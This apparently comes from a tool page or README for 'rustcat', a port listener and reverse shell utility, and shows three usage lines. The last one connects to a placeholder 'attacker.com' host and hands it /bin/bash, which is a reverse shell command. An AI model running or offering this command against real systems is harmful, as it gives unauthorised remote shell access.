Modern port listener and reverse shell tool for networking tasks
Modern Port listener and Reverse shell
rustcat
$ rustcat -l -p 4444
$ rustcat -c 192.168.1.100 -p 4444
$ rustcat -c attacker.com -p 4444 -e /bin/bash